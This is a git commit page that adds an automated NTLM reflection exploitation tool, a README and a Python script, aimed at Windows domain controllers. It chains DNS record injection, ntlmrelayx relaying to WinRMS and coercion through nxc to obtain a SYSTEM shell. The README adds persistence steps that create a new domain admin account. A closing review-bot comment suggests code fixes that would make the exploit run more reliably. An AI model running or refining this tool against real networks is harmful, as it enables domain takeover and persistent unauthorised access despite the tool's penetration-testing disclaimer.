| author | jaytiwari05 <www.jaytiwari2121@gmail.com> | 2025-11-16 20:13:06 +0530 |
|---|---|---|
| committer | jaytiwari05 <www.jaytiwari2121@gmail.com> | 2025-11-16 20:13:06 +0530 |
| commit | b6735359f1c8721ac7fce5302fac11b54acddeed (patch) | |
| tree | fbe5e25e42708cf66d9a25033fba7b17c5d24d4b /auto_ntlm_reflection | |
| parent | b7a852c0e670b91eb2e39e620fe7a9bb423ad644 (diff) | |
Added NTLM REFLECTION
Diffstat (limited to 'auto_ntlm_reflection')
| -rw-r--r-- | auto_ntlm_reflection/01.png | bin | 0 -> 463280 bytes | |||
| -rw-r--r-- | auto_ntlm_reflection/02.png | bin | 0 -> 680576 bytes | |||
| -rw-r--r-- | auto_ntlm_reflection/03.png | bin | 0 -> 701307 bytes | |||
| -rw-r--r-- | auto_ntlm_reflection/04.png | bin | 0 -> 806939 bytes | |||
| -rw-r--r-- | auto_ntlm_reflection/README.md | 181 | ||||
| -rw-r--r-- | auto_ntlm_reflection/auto_ntlm_reflection.py | 157 |
6 files changed, 338 insertions, 0 deletions
diff --git a/auto_ntlm_reflection/01.png b/auto_ntlm_reflection/01.png Binary files differnew file mode 100644 index 0000000..bbcd099 --- /dev/null +++ b/auto_ntlm_reflection/01.png diff --git a/auto_ntlm_reflection/02.png b/auto_ntlm_reflection/02.png Binary files differnew file mode 100644 index 0000000..16c0cb1 --- /dev/null +++ b/auto_ntlm_reflection/02.png diff --git a/auto_ntlm_reflection/03.png b/auto_ntlm_reflection/03.png Binary files differnew file mode 100644 index 0000000..91677dd --- /dev/null +++ b/auto_ntlm_reflection/03.png diff --git a/auto_ntlm_reflection/04.png b/auto_ntlm_reflection/04.png Binary files differnew file mode 100644 index 0000000..1623ad7 --- /dev/null +++ b/auto_ntlm_reflection/04.png diff --git a/auto_ntlm_reflection/README.md b/auto_ntlm_reflection/README.md new file mode 100644 index 0000000..9836e5c --- /dev/null +++ b/auto_ntlm_reflection/README.md 
@@ -0,0 +1,181 @@ +# NTLM Reflection Auto-Exploitation Tool + +A powerful automation tool for exploiting NTLM Reflection vulnerabilities to gain Domain Admin privileges on Windows domains. + +## 🚀 Features + +- **Automated DNS Record Injection** - Adds malicious DNS records for coercion +- **NTLM Relay Attack** - Relays authentication to WinRM for SYSTEM shell +- **Coercion Automation** - Uses multiple coercion techniques (DFSCoerce, PetitPotam, etc.) +- **Background Process Management** - Handles all processes automatically +- **Shell Detection** - Automatically detects when WinRM shell is ready +- **Clean Interface** - Provides clear instructions for shell access + +## 📋 Prerequisites + +### Required Tools +```bash +# Install dependencies +sudo apt update +sudo apt install python3 python3-pip netcat + +# Install required Python packages +pipx uninstall impacket +pipx install git+https://github.com/fortra/impacket.git + + +# Install netexec (nxc) +pipx uninstall NetExec +pipx install git+https://github.com/Pennyw0rth/NetExec +``` + +### Required Access +- Valid domain user credentials +- Network access to Domain Controller +- Ability to create DNS records + +## 🛠️ Usage + +### Basic Syntax +```bash +./auto_ntlm_reflection.py -u 'DOMAIN\\USER' -p 'PASSWORD' -d DOMAIN -dc-name DC_HOSTNAME -ip YOUR_IP -dc-ip DC_IP +``` + +### Example +```bash +./auto_ntlm_reflection.py -u 'paincorp.local\web_svc' -p 'dksehdgh712!@#' -d paincorp.local -dc-name dc01.paincorp.local -ip 10.10.xx.xx -dc-ip 10.129.xxx.xxx +``` + +### Parameters +- `-u` : Domain user (format: `DOMAIN\\USER`) +- `-p` : Password for the user +- `-d` : Domain name +- `-dc-name` : Domain Controller hostname +- `-ip` : Your attacking machine IP address +- `-dc-ip` : Domain Controller IP address + +## 🔄 Automated Shell Listener + +For automatic connection when the shell is ready, use this while loop: + +```bash +while ! nc 127.0.0.1 11000 2>/dev/null; do sleep 1; done +``` + +## 🎯 Proof of Concept + +### 1. 
Verify Shell Access +```cmd +whoami +# Output: nt authority\system +``` + + +### 2. Retrieve Root Flag +```cmd +type C:\Users\Administrator\Desktop\root.txt +``` + +### 3. Create Persistence User +```cmd +net user pain Password@123 /add +net group "domain admins" pain /add +net localgroup administrators pain /add +net user pain +``` + + +### 4. Verify Domain Admin Access +```cmd +net group "domain admins" +``` + +### 5. Establish WinRM Connection (Alternative Access) +```bash +python3 /opt/winrmexec/evil_winrmexec.py -ssl -port 5986 paincorp.local/pain:'Password@123'@dc01.paincorp.local +``` + + + + + +## 🎥 Attack Flow + +1. **DNS Poisoning** - Injects malicious DNS record +2. **Coercion Trigger** - Forces DC to authenticate to attacker +3. **NTLM Relay** - Relays authentication to WinRM service +4. **SYSTEM Shell** - Gains interactive SYSTEM shell on DC +5. **Persistence** - Creates new domain admin user + +## 🛡️ Techniques Used + +- **DFSCoerce** - DFS namespace coercion +- **PetitPotam** - EFS RPC coercion +- **NTLM Relay** - Authentication relay to WinRM +- **DNS Admin Abuse** - DNS record modification +- **WinRM Exploitation** - WinRM service compromise + +## 📊 Expected Output + +When successful, you'll see: +``` +[!] SHELL READY! Run this command in a new terminal: +[!] nc 127.0.0.1 11000 +[!] Both processes are still running in the background +``` + +## 🔧 Troubleshooting + +### Common Issues + +1. **Port 445 in use** + ```bash + sudo systemctl stop smbd + ``` + +2. **DNS record already exists** + - Tool automatically handles duplicate records + +3. **Shell not responding** + - Wait 10-30 seconds for WinRM to stabilize + - Try pressing Enter multiple times + - Start with simple commands like `whoami` + +4. 
**Connection refused** + - Ensure ntlmrelayx process is still running + - Check if coercion triggered successfully + +### Process Management +```bash +# Check running processes +ps aux | grep -E '(ntlmrelayx|nxc)' + +# Kill all processes manually +pkill -f 'ntlmrelayx' +pkill -f 'nxc smb' +``` + +## ⚠️ Legal Disclaimer + +This tool is for educational and authorized penetration testing purposes only. The authors are not responsible for any misuse or damage caused by this tool. Always ensure you have proper authorization before testing. + +## 📝 Notes + +- Requires DNS admin privileges or equivalent +- Works best when attacker can create DNS records +- Multiple coercion methods increase success rate +- WinRM shells may be slow to respond initially +- Always clean up created users after testing + +## 🎯 Success Indicators + +- `nt authority\system` in whoami output +- Ability to read Administrator files +- Successful creation of domain admin user +- WinRM access with new credentials + +--- + +**Author**: PaiN05 +**Tool**: NTLM Reflection Auto-Exploitation +**Purpose**: Red Team Operations & Penetration Testing
\ No newline at end of file diff --git a/auto_ntlm_reflection/auto_ntlm_reflection.py b/auto_ntlm_reflection/auto_ntlm_reflection.py new file mode 100644 index 0000000..8160bec --- /dev/null +++ b/auto_ntlm_reflection/auto_ntlm_reflection.py 
@@ -0,0 +1,157 @@ +#!/usr/bin/env python3 + +# Code for Automating NTLM_Reflection Attack +# Author : PaiN05 +# 16-11-2025 + +import os +import argparse +import threading +import subprocess +import time +import signal + +listener = "localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA" +shell_detected = False + +def run_process(cmd, process_name): + """Run a process and monitor for shell string""" + global shell_detected + + process = subprocess.Popen( + cmd, + shell=True, + stdout=subprocess.PIPE, + stderr=subprocess.STDOUT, + text=True, + bufsize=1 + ) + + print(f"[{process_name}] Started with PID: {process.pid}") + + for line in process.stdout: + print(f"[{process_name}] {line}", end="", flush=True) + + # Check for WinRMS shell string + if "Started interactive WinRMS shell via TCP on 127.0.0.1:11000" in line and not shell_detected: + shell_detected = True + print(f"\n" + "="*60) + print(f"[!] SHELL READY! Run this command in a new terminal:") + print(f"[!] nc 127.0.0.1 11000") + print(f"[!] Both processes are still running in the background") + print(f"="*60) + + return process + +def main(): + global shell_detected + + parser = argparse.ArgumentParser( + description="Automate NTLM relay workflow (DNS → DIG → Relay → Coerce)." + ) + + # DNS related details + parser.add_argument("-u", required=True, help="Domain user (DOMAIN.LOCAL\\user)") + parser.add_argument("-p", required=True, help="Password for the user") + parser.add_argument("-d", required=True, help="Domain Name (e.g. paincorp.local)") + parser.add_argument("-dc-name", required=True, help="DC hostname (e.g. dc01.paincorp.local)") + parser.add_argument("-dc-ip", required=True, help="DC hostname (e.g. 
paincorp.local)") + parser.add_argument("-ip", required=True, help="IP address the DNS record should point to") + + args = parser.parse_args() + + # PRINT parsed arguments + print("[+] Parsed arguments:") + for k, v in vars(args).items(): + print(f" {k}: {v}") + + # Checking NTLM Reflection + check_ntlm_reflection = ( + f"nxc smb {args.dc_name} " + f"-u {args.u.split('\\')[-1]} -p '{args.p}' " + f"-M ntlm_reflection" + ) + #print(f"\n[+] NTLM_Reflection Exist:\n{dns_cmd}\n") + + # DNS add + dns_cmd = ( + f"python3 /opt/krbrelayx/dnstool.py " + f"-u '{args.d}\{args.u}' -p '{args.p}' " + f"{args.dc_name} -a add -r '{listener}' " + f"-d '{args.ip}' -dns-ip {args.dc_ip} --tcp --allow-multiple" + ) + #print(f"\n[+] DNS Command:\n{dns_cmd}\n") + + # DIG check + dig_cmd = ( + f"dig {listener}.{args.d} " + f"@{args.dc_name} +tcp +short" + ) + #print(f"[+] DIG Verification:\n{dig_cmd}\n") + + # Relay + relay_cmd = ( + f"ntlmrelayx.py -smb2support -t 'winrms://{args.dc_name}'" + ) + #print(f"[+] Relay Command:\n{relay_cmd}\n") + + # Coerce + coerce_cmd = ( + f"nxc smb {args.dc_name} " + f"-u {args.u.split('\\')[-1]} -p '{args.p}' " + f"-M coerce_plus -o LISTENER={listener} ALWAYS=true" + ) + #print(f"[+] Coerce Command:\n{coerce_cmd}\n") + + # --------------------------------------------------------- + # EXECUTION PHASE - JUST MONITOR AND INFORM USER + # --------------------------------------------------------- + + # Checking for NTLM Reflection using nxc + print("\n NTLM Reflection Exists") + os.system(check_ntlm_reflection) + + # Run DNS and DIG first + print("\n[+] Running DNS setup...") + os.system(dns_cmd) + + print("\n[+] Running DIG verification...") + os.system(dig_cmd) + + # Start both processes + print("\n[+] Starting ntlmrelayx and nxc coerce...") + + # Start relay in a thread + relay_thread = threading.Thread( + target=run_process, + args=(relay_cmd, "RELAY"), + daemon=True + ) + relay_thread.start() + + # Wait a bit then start coerce + time.sleep(3) + + # Start 
coerce in a thread + coerce_thread = threading.Thread( + target=run_process, + args=(coerce_cmd, "COERCE"), + daemon=True + ) + coerce_thread.start() + + # Wait for shell detection or let processes run + print("\n[+] Monitoring for shell... (Press Ctrl+C to stop all processes)") + + try: + # Keep the main thread alive + while True: + time.sleep(1) + except KeyboardInterrupt: + print(f"\n[!] Stopping all processes...") + os.system("pkill -f 'ntlmrelayx' 2>/dev/null") + os.system("pkill -f 'nxc smb' 2>/dev/null") + print("[!] All processes stopped.") + +if __name__ == "__main__": + main()
\ No newline at end of file |
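Review bot: The `f"-u {args.u.split('\\')[-1]} -p '{args.p}' "` pieces in `check_ntlm_reflection` and `coerce_cmd` place a backslash inside an f-string replacement field, which is a SyntaxError on every Python before 3.12 (PEP 701 lifted that restriction), so the module fails to parse on older interpreters; hoisting the split into a local, `user = args.u.split('\\')[-1]`, and referencing `{user}` in both f-strings removes that version dependency, and the nearby `'{args.d}\{args.u}'` contains the invalid escape `\{` that 3.12 flags as a SyntaxWarning and should be `\\{`. The `-dc-ip` argument reuses the `-dc-name` help text (`help="DC hostname (e.g. paincorp.local)"`) and should read something like `help="DC IP address"`. `signal` is imported but never used. Every command is built by interpolating argv values into a `shell=True` string, so a password or username containing a quote breaks the command or is interpreted by the shell; passing an argument list (or `shlex.quote` on each value) avoids that. The `KeyboardInterrupt` handler runs `pkill -f 'ntlmrelayx'` and `pkill -f 'nxc smb'`, which terminates any matching process on the host rather than the two children this script started; `run_process` already holds the `Popen` handles, so keeping them (e.g. in a module-level list) and calling `terminate()` on each would be precise and would also let the handler report exit status instead of assuming success.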
